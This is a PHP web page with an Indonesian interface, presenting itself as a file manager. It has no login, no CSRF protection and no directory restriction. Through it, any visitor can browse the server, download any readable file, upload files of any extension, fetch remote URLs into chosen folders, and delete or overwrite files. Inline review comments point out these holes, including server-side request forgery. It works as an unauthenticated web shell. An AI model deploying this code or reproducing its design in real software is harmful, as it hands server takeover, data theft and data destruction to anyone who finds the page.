<?php
// filemanager.php
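// Report every error class, but keep the messages out of HTTP responses:
// warnings raised by the filesystem calls in this script contain absolute
// server paths, which a web-reachable page should not print to visitors.
error_reporting(E_ALL);
ini_set('display_errors', '0');
// Route diagnostics to the configured error log instead.
ini_set('log_errors', '1');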
// ------------ Util & init -------------
/**
 * Resolve a path with realpath(), falling back to a purely textual clean-up.
 *
 * Despite the name this is a normaliser, not an access check: it does not
 * compare the result with any allowed base directory, and the fallback keeps
 * ".." components exactly as they were given. It also never returns false,
 * so a caller that compares the result with false will not see a failure.
 *
 * @param string $p Path to resolve.
 * @return string Canonical path when realpath() succeeds; otherwise $p with
 *                both separator styles unified and trailing separators removed.
 */
function safeRealpath($p) {
    $resolved = realpath($p);
    if ($resolved !== false) {
        return $resolved;
    }
    // realpath() fails for paths that do not exist; tidy the text instead
    $unified = str_replace(['/', '\\'], DIRECTORY_SEPARATOR, $p);
    return rtrim($unified, DIRECTORY_SEPARATOR);
}
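// Determine the directory to list: GET 'dir' when it is a string, else getcwd().
// A repeated parameter such as dir[] arrives as an array, which realpath()
// cannot take, so anything that is not a string is ignored.
$requested = (isset($_GET['dir']) && is_string($_GET['dir'])) ? $_GET['dir'] : getcwd();
$currentDir = safeRealpath($requested);
// safeRealpath() hands back its textual fallback rather than false, so test
// for a usable string instead of comparing with false.
if (!is_string($currentDir) || $currentDir === '') {
    $currentDir = getcwd();
}
// NOTE(review): $currentDir is whatever the request named; nothing in this file
// limits browsing to a base directory or checks who is asking.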
// ---------------- LOCAL DOWNLOAD ----------------
// Streams the file named by GET 'download' back as an attachment, then stops.
// NOTE(review): the path is taken from the request as-is. This file applies no
// login check and no base-directory restriction, so every file readable by the
// PHP user is served by this branch. Access logs showing "?download=" with
// absolute paths are the trace it leaves.
if (isset($_GET['download'])) {
    $downloadPath = safeRealpath($_GET['download']);
    $canServe = $downloadPath && is_file($downloadPath) && is_readable($downloadPath);
    if (!$canServe) {
        echo "File tidak ditemukan atau tidak dapat dibaca.";
        exit;
    }
    // Only the last path component is exposed as the suggested file name
    $attachmentName = basename($downloadPath);
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $attachmentName . '"');
    header('Content-Length: ' . filesize($downloadPath));
    readfile($downloadPath);
    exit;
}
// ---------------- Actions ----------------
/**
 * Send the browser back to the listing of $dir and end the request.
 *
 * @param string $dir Directory to show next; URL-encoded into the "dir" query parameter.
 * @return void Does not return: the script exits once the header is queued.
 */
function redirectTo($dir) {
    $encoded = urlencode($dir);
    header("Location: ?dir=" . $encoded);
    exit;
}
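// ---------------- LOCAL UPLOAD ----------------
// Stores the multipart field "upload" in POST 'current_dir' (or getcwd() when
// that is missing or not a directory) and leaves a status line, built as HTML,
// in $uploadMessage for the page to print.
// NOTE(review): the cleaned name keeps whatever extension the client sent and
// may begin with a dot, the destination comes from the request, and an existing
// file of the same name is overwritten. This file does not authenticate the
// caller. If the handler is kept, restrict extensions and destination and put
// it behind a login.
$uploadMessage = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload'])) {
    $postDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : getcwd();
    // If the posted path is a file, use the directory that contains it
    if ($postDir && is_file($postDir)) $postDir = dirname($postDir);
    $targetDir = ($postDir && is_dir($postDir)) ? $postDir : getcwd();
    $f = $_FILES['upload'];
    if ($f['error'] !== UPLOAD_ERR_OK) {
        $uploadMessage = "Upload error (code {$f['error']}).";
    } elseif (!is_uploaded_file($f['tmp_name'])) {
        $uploadMessage = "File upload tidak valid (bukan dari HTTP POST).";
    } elseif (!is_writable($targetDir)) {
        $uploadMessage = "Folder tujuan tidak writable: " . htmlspecialchars($targetDir);
    } else {
        // Keep the last path component only, then replace every character
        // outside A-Z a-z 0-9 . _ - with an underscore
        $orig = basename($f['name']);
        $safe = preg_replace('/[^A-Za-z0-9._-]/', '_', $orig);
        if ($safe === '' || $safe === '.' || $safe === '..') {
            $uploadMessage = "Nama file tidak valid.";
        } else {
            $targetPath = $targetDir . DIRECTORY_SEPARATOR . $safe;
            $in = @fopen($f['tmp_name'], 'rb');
            // Open (and thereby truncate) the target only once the source is
            // readable, so a failed read never leaves an existing file emptied.
            $out = $in ? @fopen($targetPath, 'wb') : false;
            if ($in && $out) {
                $bytes = stream_copy_to_stream($in, $out);
                fclose($in);
                fclose($out);
                if ($bytes !== false) {
                    @chmod($targetPath, 0644);
                    $uploadMessage = "✅ File dibuat & diisi: " . htmlspecialchars($safe)
                        . "<br>Lokasi: " . htmlspecialchars($targetDir)
                        . "<br>Ukuran tersalin: " . number_format($bytes) . " byte"
                        . "<br><a href='?download=" . rawurlencode($targetPath) . "' target='_blank'>⬇️ Download</a>";
                } else {
                    // Remove the partial copy
                    @unlink($targetPath);
                    $uploadMessage = "❌ Gagal menyalin isi file ke: " . htmlspecialchars($targetPath);
                }
            } else {
                if ($in) fclose($in);
                if ($out) fclose($out);
                $uploadMessage = "❌ Tidak bisa membuka stream baca/tulis. Periksa permission folder.";
            }
        }
    }
}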
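// ---------------- DOWNLOAD FROM URL ----------------
// Fetches POST 'download_url' from the server side and stores the response
// body in POST 'current_dir'; the outcome, built as HTML, is left in
// $downloadMessage for the page to print.
// NOTE(review): the request is made by the server, so even an http(s) URL can
// address hosts that only the server can reach. If this handler is kept,
// restrict destinations as well as schemes and require authentication.
$downloadMessage = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['download_url']) && is_string($_POST['download_url'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : getcwd();
    $url = trim($_POST['download_url']);
    // FILTER_VALIDATE_URL checks syntax only and accepts non-web schemes, which
    // fopen() would hand to PHP's other stream wrappers; allow http(s) only.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (filter_var($url, FILTER_VALIDATE_URL) && in_array($scheme, ['http', 'https'], true)) {
        // parse_url() yields null when the URL has no path component
        $filename = basename((string) parse_url($url, PHP_URL_PATH));
        $filename = preg_replace('/[^A-Za-z0-9._-]/', '_', $filename);
        if ($filename === '' || $filename === '.' || $filename === '..') $filename = 'downloaded_file';
        $targetPath = $currentDir . DIRECTORY_SEPARATOR . $filename;
        // Stream the remote body to disk. The target is opened (and truncated)
        // only after the URL opened, so a failed fetch does not empty or
        // create a file.
        $in = @fopen($url, 'rb');
        $out = $in ? @fopen($targetPath, 'wb') : false;
        if ($in && $out) {
            $bytes = stream_copy_to_stream($in, $out);
            fclose($in);
            fclose($out);
            if ($bytes !== false) {
                @chmod($targetPath, 0644);
                $downloadMessage = "✅ File dari URL berhasil didownload: <strong>" . htmlspecialchars($filename) . "</strong>\n"
                    . "<br>Lokasi: " . htmlspecialchars($currentDir)
                    . "<br><a href='?download=" . rawurlencode($targetPath) . "' target='_blank'>⬇️ Download</a>";
            } else {
                // Remove the partial copy
                @unlink($targetPath);
                $downloadMessage = "❌ Gagal menulis file dari URL.";
            }
        } else {
            if ($in) fclose($in);
            if ($out) fclose($out);
            $downloadMessage = "❌ Tidak bisa membuka URL atau folder tujuan.";
        }
    } else {
        $downloadMessage = "❌ URL tidak valid.";
    }
}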
// ---------------- DELETE ----------------
// Removes the path given in POST 'delete', then redirects to the listing.
// rmdir() only succeeds on empty directories; every failure is hidden by @.
// NOTE(review): the only gate is that the resolved path contains a directory
// separator, which holds for every absolute path. No authentication, CSRF
// token or base-directory check is applied in this file.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delete'])) {
    if (isset($_POST['current_dir'])) {
        $currentDir = safeRealpath($_POST['current_dir']);
    }
    $target = safeRealpath($_POST['delete']);
    $looksLikePath = $target && strpos($target, DIRECTORY_SEPARATOR) !== false;
    if ($looksLikePath) {
        if (is_dir($target)) {
            @rmdir($target);
        } else {
            @unlink($target);
        }
    }
    redirectTo($currentDir);
}
// ---------------- RENAME ----------------
// Renames POST 'rename_path' to a cleaned POST 'new_name' inside the same
// directory, then redirects to the listing.
// NOTE(review): unlike the upload branch, an empty, "." or ".." result is not
// rejected and an existing target is not checked for; rename() errors are
// hidden by @. The cleaned name keeps any extension it was given.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['rename_path'], $_POST['new_name'])) {
    if (isset($_POST['current_dir'])) {
        $currentDir = safeRealpath($_POST['current_dir']);
    }
    $old = safeRealpath($_POST['rename_path']);
    // basename() drops any directory part, so the entry stays in its directory
    $newName = basename($_POST['new_name']);
    if ($old && file_exists($old)) {
        $cleanName = preg_replace('/[^A-Za-z0-9._-]/', '_', $newName);
        $newPath = dirname($old) . DIRECTORY_SEPARATOR . $cleanName;
        @rename($old, $newPath);
    }
    redirectTo($currentDir);
}
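// ---------------- EDIT / SAVE ----------------
// Edit, step 1: print a form holding the contents of POST 'edit_path', then stop.
// NOTE(review): the path comes from the request, so any file readable by the
// PHP user is displayed; this file applies no authentication or base-directory
// check before doing so.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_path']) && !isset($_POST['save_content'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    $editPath = safeRealpath($_POST['edit_path']);
    if ($editPath && is_file($editPath) && is_readable($editPath)) {
        $raw = file_get_contents($editPath);
        if ($raw === false) {
            // The read failed after the checks above; do not present an empty editor
            redirectTo($currentDir);
        }
        // ENT_QUOTES: the values below sit in single-quoted attributes, and the
        // default flags before PHP 8.1 leave the apostrophe unescaped.
        // ENT_SUBSTITUTE: without it, content that is not valid UTF-8 comes back
        // as '' and saving the form would empty the file. Invalid bytes are
        // shown as U+FFFD instead and would be saved that way.
        $flags = ENT_QUOTES | ENT_SUBSTITUTE;
        $content = htmlspecialchars($raw, $flags, 'UTF-8');
        $pathHtml = htmlspecialchars($editPath, $flags, 'UTF-8');
        $dirHtml = htmlspecialchars((string) $currentDir, $flags, 'UTF-8');
        echo "<h3>Editing: " . $pathHtml . "</h3>\n"
            . "<form method='post'>\n"
            . "<input type='hidden' name='save_path' value='" . $pathHtml . "'>\n"
            . "<input type='hidden' name='current_dir' value='" . $dirHtml . "'>\n"
            . "<textarea name='content' rows='20' cols='100'>" . $content . "</textarea><br>\n"
            . "<button type='submit' name='save_content'>Simpan</button>\n"
            . "</form>";
        exit;
    } else {
        redirectTo($currentDir);
    }
}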
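// Edit, step 2: write POST 'content' over the existing file POST 'save_path',
// then redirect to the listing.
// NOTE(review): the target path is taken from the request; any existing file
// writable by the PHP user can be replaced, with no authentication or CSRF
// token checked in this file.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save_content'], $_POST['save_path'])) {
    $savePath = safeRealpath($_POST['save_path']);
    // Require the body explicitly: writing a missing 'content' value would
    // truncate the file to zero bytes. An empty string is still accepted.
    $hasBody = isset($_POST['content']) && is_string($_POST['content']);
    if ($hasBody && $savePath && is_file($savePath) && is_writable($savePath)) {
        file_put_contents($savePath, $_POST['content']);
    }
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    redirectTo($currentDir);
}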
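// ---------------- CREATE FILE / FOLDER ----------------
// Creates an empty file named by POST 'new_file' in the current directory,
// then redirects to the listing.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_file'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    // Last path component only, limited to A-Z a-z 0-9 . _ -
    $name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($_POST['new_file']));
    if ($name !== '' && $name !== '.' && $name !== '..') {
        // Mode 'x' creates the file only when it does not exist yet, so an
        // existing file with the same name keeps its contents.
        $handle = @fopen($currentDir . DIRECTORY_SEPARATOR . $name, 'x');
        if ($handle) fclose($handle);
    }
    redirectTo($currentDir);
}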
// Creates a directory named by POST 'new_folder' in the current directory,
// then redirects to the listing. mkdir() is called without a mode argument,
// and its failures (for example an existing name) are hidden by @.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_folder'])) {
    if (isset($_POST['current_dir'])) {
        $currentDir = safeRealpath($_POST['current_dir']);
    }
    $name = basename($_POST['new_folder']);
    $cleanName = preg_replace('/[^A-Za-z0-9._-]/', '_', $name);
    @mkdir($currentDir . DIRECTORY_SEPARATOR . $cleanName);
    redirectTo($currentDir);
}
// ---------------- LISTING ----------------
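/**
 * Render $dir as a chain of links, one per path component.
 *
 * Each link's "dir" parameter is the cumulative path up to that component,
 * URL-encoded; the visible label is the component name, HTML-escaped.
 *
 * @param string $dir Directory path; both "/" and "\" are treated as separators.
 * @return string HTML fragment with the links joined by " / ", or a single
 *                root link when $dir has no components.
 */
function buildBreadcrumb($dir) {
    $parts = preg_split('#[\\/\\\\]#', $dir, -1, PREG_SPLIT_NO_EMPTY);
    // Absolute POSIX paths keep their leading slash; anything else starts empty
    $acc = (DIRECTORY_SEPARATOR === '/' && substr($dir, 0, 1) === '/') ? DIRECTORY_SEPARATOR : '';
    $links = [];
    foreach ($parts as $p) {
        $acc .= ($acc === DIRECTORY_SEPARATOR || $acc === '') ? $p : DIRECTORY_SEPARATOR . $p;
        $label = basename($acc);
        // Compare with '' rather than relying on truthiness: a directory
        // named "0" is a valid label and must not fall back to the full path
        if ($label === '') $label = $acc;
        $links[] = "<a href='?dir=" . urlencode($acc) . "'>"
            . htmlspecialchars($label, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</a>";
    }
    if (empty($links)) return "<a href='?dir=" . urlencode(DIRECTORY_SEPARATOR) . "'>/</a>";
    return implode(" / ", $links);
}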
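/**
 * Echo one table row per entry of $dir, each with its action forms.
 *
 * "." is skipped and ".." becomes a link to the parent directory. Every other
 * entry gets delete and rename forms; files also get a download link and an
 * edit form. Paths are carried in hidden fields and posted back to this script.
 *
 * NOTE(review): the forms carry no anti-CSRF token, and the handlers that
 * receive them take the posted paths at face value.
 *
 * @param string $dir Directory to list.
 * @return void Output is written directly with echo.
 */
function listFilesAndDirs($dir) {
    $items = @scandir($dir);
    if ($items === false) {
        echo "<tr><td colspan='5'>Tidak dapat membaca direktori ini.</td></tr>";
        return;
    }
    // Entry names come from the filesystem and are placed in single-quoted
    // attributes below. ENT_QUOTES escapes the apostrophe, which the default
    // flags before PHP 8.1 leave as-is; ENT_SUBSTITUTE keeps names that are
    // not valid UTF-8 from collapsing to an empty string.
    $esc = function ($value) {
        return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    };
    $dirAttr = $esc($dir);
    foreach ($items as $item) {
        if ($item === '.') continue;
        if ($item === '..') {
            $parent = dirname($dir);
            echo "<tr><td>📁</td><td><a href='?dir=" . urlencode($parent) . "'>.. (Parent)</a></td><td>-</td><td>-</td><td>-</td></tr>";
            continue;
        }
        $path = $dir . DIRECTORY_SEPARATOR . $item;
        $type = is_dir($path) ? 'Folder' : 'File';
        $size = is_file($path) ? filesize($path) : '-';
        // file_exists() is false for a dangling symlink, which has no mtime to show
        $time = file_exists($path) ? date("Y-m-d H:i:s", filemtime($path)) : '-';
        $pathAttr = $esc($path);
        // Folders link into themselves; files are plain text
        $nameCell = ($type === 'Folder')
            ? "<a href='?dir=" . urlencode($path) . "'>" . $esc($item) . "</a>"
            : $esc($item);
        echo "<tr>\n"
            . "<td>" . ($type === 'Folder' ? '📁' : '📄') . "</td>\n"
            . "<td>" . $nameCell . "</td>\n"
            . "<td>" . $esc($size) . "</td>\n"
            . "<td>" . $esc($time) . "</td>\n"
            . "<td>\n"
            . "<form method='post' style='display:inline'>\n"
            . "<input type='hidden' name='delete' value='" . $pathAttr . "'>\n"
            . "<input type='hidden' name='current_dir' value='" . $dirAttr . "'>\n"
            . "<button onclick='return confirm(\"Yakin hapus?\")'>🗑</button>\n"
            . "</form>\n"
            . "<form method='post' style='display:inline'>\n"
            . "<input type='hidden' name='rename_path' value='" . $pathAttr . "'>\n"
            . "<input type='hidden' name='current_dir' value='" . $dirAttr . "'>\n"
            . "<input type='text' name='new_name' placeholder='Nama baru' required>\n"
            . "<button>✏️</button>\n"
            . "</form>";
        if ($type === 'File') {
            echo " <a href='?download=" . urlencode($path) . "'>⬇️ Download</a>\n"
                . "<form method='post' style='display:inline'>\n"
                . "<input type='hidden' name='edit_path' value='" . $pathAttr . "'>\n"
                . "<input type='hidden' name='current_dir' value='" . $dirAttr . "'>\n"
                . "<button>📝 Edit</button>\n"
                . "</form>";
        }
        echo "</td></tr>";
    }
}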
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>File Manager</title>
<style>
body { font-family: Arial, sans-serif; padding:16px; background:#f7f7f7; }
table { width:100%; background:#fff; border-collapse:collapse; }
th, td { padding:8px; border:1px solid #e1e1e1; }
form { margin:0; display:inline; }
input[type="text"], input[type="url"] { padding:4px; }
</style>
</head>
<body>
<h2>File Manager</h2>
<p><strong>Lokasi saat ini:</strong> <?= buildBreadcrumb($currentDir) ?></p>
<?php /* Upload status. Printed without escaping because the upload handler builds it as HTML and escapes the file and directory names it embeds. */ if ($uploadMessage): ?>
<div style="padding:8px; background:#efe; border:1px solid #cfc; margin-bottom:8px;"><?= $uploadMessage ?></div>
<?php endif; ?>
<?php /* URL-download status. Also pre-built HTML from its handler, which escapes the file name and directory it embeds. */ if ($downloadMessage): ?>
<div style="padding:8px; background:#eef; border:1px solid #ccf; margin-bottom:8px;"><?= $downloadMessage ?></div>
<?php endif; ?>
<!-- Upload File Lokal -->
<form method="post" enctype="multipart/form-data" style="margin-bottom:8px;">
<input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
<input type="file" name="upload" required>
<button>⬆ Upload</button>
</form>
<!-- Download File dari URL -->
<form method="post" style="margin-bottom:8px;">
<input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
<input type="url" name="download_url" placeholder="Masukkan URL file" required style="width:300px;">
<button>🌐 Download dari URL</button>
</form>
<!-- Buat File / Folder -->
<form method="post" style="display:inline; margin-right:8px;">
<input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
<input type="text" name="new_file" placeholder="Nama file baru">
<button>📄 Buat File</button>
</form>
<form method="post" style="display:inline;">
<input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
<input type="text" name="new_folder" placeholder="Nama folder baru">
<button>📁 Buat Folder</button>
</form>
<table style="margin-top:12px;">
<thead><tr><th>Type</th><th>Nama</th><th>Ukuran</th><th>Waktu</th><th>Aksi</th></tr></thead>
<tbody>
<?php listFilesAndDirs($currentDir); ?>
</tbody>
</table>
</body>
</html>